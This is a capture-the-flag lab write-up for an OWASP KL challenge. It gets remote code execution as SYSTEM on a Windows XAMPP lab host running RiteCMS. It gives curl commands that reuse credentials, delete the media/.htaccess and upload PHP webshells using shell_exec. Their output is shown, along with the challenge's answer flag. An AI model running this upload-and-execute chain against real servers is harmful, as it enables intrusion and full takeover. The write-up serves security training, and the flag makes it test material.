The Art of Evasion & Persistence - II
192.168.1.22OWASPKL{xxx}1. Challenge Overview
Reuse the Part I creds (webadmin:webhead2290) on RiteCMS (8080). PHP execution in media/ is blocked by .htaccess; delete it via the file manager, upload a PHP payload, and read C:\Users\Administrator\Desktop\proof.txt as nt authority\system.
2. Initial Reconnaissance
2.1 Confirm the web service
1nmap -sC -sV -p 8080 192.168.1.22 -oA art2_nmap_808018080/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.0.30)2http-title: Welcome to XAMPP3. Analysis / Forensics Path
3.1 Log in and enumerate the media directory
Reuse the Part I creds, then browse the file manager. The login redirects (302) and the media listing shows a .htaccess sitting alongside the uploads dir.
1curl -s -c proof/rite.cookie -d 'username=webadmin&userpw=webhead2290' -X POST 'http://192.168.1.22:8080/ritecms/admin.php' -o /dev/null -w 'login http=%{http_code}\n'2curl -s -b proof/rite.cookie 'http://192.168.1.22:8080/ritecms/admin.php?mode=filemanager&directory=media' | grep -oiE '\.htaccess|[a-z_]+\.php' | sort -u1login http=3022.htaccess3.2 Confirm .htaccess blocks PHP execution
Fetching anything under media/ while the .htaccess is present returns 403 — PHP is denied until that file is removed via the same file manager.
1curl -s -o /dev/null -w 'GET /ritecms/media/.htaccess -> http=%{http_code}\n' 'http://192.168.1.22:8080/ritecms/media/.htaccess'1GET /ritecms/media/.htaccess -> http=4034. Exploitation / Recovery
4.1 Log into RiteCMS (Part I creds)
1curl -s -i -c proof/rite.cookie -d 'username=webadmin&userpw=webhead2290' -X POST 'http://192.168.1.22:8080/ritecms/admin.php'1HTTP/1.1 302 Found2Location: ./4.2 Delete media/.htaccess
1curl -s -i -b proof/rite.cookie \2 -d 'mode=filemanager&delete=.htaccess&dir=media&confirmed=OK+-+Delete+file' \3 -X POST 'http://192.168.1.22:8080/ritecms/admin.php'4.3 Upload and run the enumeration payload
First upload kali_enum.php to confirm the execution context and locate the flag instead of assuming its path or name.
1<?php2header('Content-Type: text/plain');3echo "WHOAMI=" . trim((string)shell_exec('whoami')) . "\n";4echo "--- Administrator Desktop listing ---\n";5echo shell_exec('dir /b C:\\Users\\Administrator\\Desktop') . "\n";6echo "--- Files matching flag format ---\n";7echo shell_exec('findstr /s /i /m "OWASPKL{" C:\\Users\\Administrator\\Desktop*');8?>1curl -s -i -b proof/rite.cookie \2 -F 'mode=filemanager' -F 'directory=media' \3 -F 'file_name=kali_enum.php' -F 'overwrite_file=true' -F 'upload_mode=1' \4 -F 'upload_file_submit=OK - Upload file' \5 -F 'file=@payloads/kali_enum.php;type=application/octet-stream' \6 'http://192.168.1.22:8080/ritecms/admin.php'7curl -s 'http://192.168.1.22:8080/ritecms/media/kali_enum.php'1WHOAMI=nt authority\system2--- Administrator Desktop listing ---3proof.txt4--- Files matching flag format ---5C:\Users\Administrator\Desktop\proof.txtExecution is nt authority\system and proof.txt is the file on the Administrator desktop matching the OWASPKL{ format.
4.4 Upload the flag-read payload
1<?php2header('Content-Type: text/plain');3echo "WHOAMI=" . trim((string)shell_exec('whoami')) . "\n";4echo "PROOF=" . @file_get_contents('C:\\Users\\Administrator\\Desktop\\proof.txt');5?>1curl -s -i -b proof/rite.cookie \2 -F 'mode=filemanager' -F 'directory=media' \3 -F 'file_name=kali_proof.php' -F 'overwrite_file=true' -F 'upload_mode=1' \4 -F 'upload_file_submit=OK - Upload file' \5 -F 'file=@payloads/kali_proof.php;type=application/octet-stream' \6 'http://192.168.1.22:8080/ritecms/admin.php'4.5 Execute payload and read flag
1curl -s 'http://192.168.1.22:8080/ritecms/media/kali_proof.php'1WHOAMI=nt authority\system2PROOF=OWASPKL{33e9d2bbd6c42bf3b71aefbe7dan1543}> Re-validated live (full chain) on 2026-05-31 via Kali (192.168.1.10): logged into RiteCMS as webadmin (302, authenticated Filemanager confirmed), uploaded a fresh uniquely-named PHP payload through the file manager, executed it -> nt authority\system + the flag above, then deleted the test payload (post-delete http=302, bytes=0).
5. Flag
6. Summary of Approach & Key Takeaways
Reused valid CMS creds from Part I.
Deleted the restrictive media/.htaccess via the file manager.
Uploaded a PHP payload through the authenticated file manager.
Enumerated as SYSTEM to locate proof.txt via a desktop listing and OWASPKL{ format search.
Read the located Administrator proof file.
An authenticated file manager + deletable .htaccess = trivial RCE.
On XAMPP/Windows the web service often runs as SYSTEM, so webshell = full compromise.
Payload Files (Required Upload)
payloads/kali_proof.php
payloads/kali_enum.php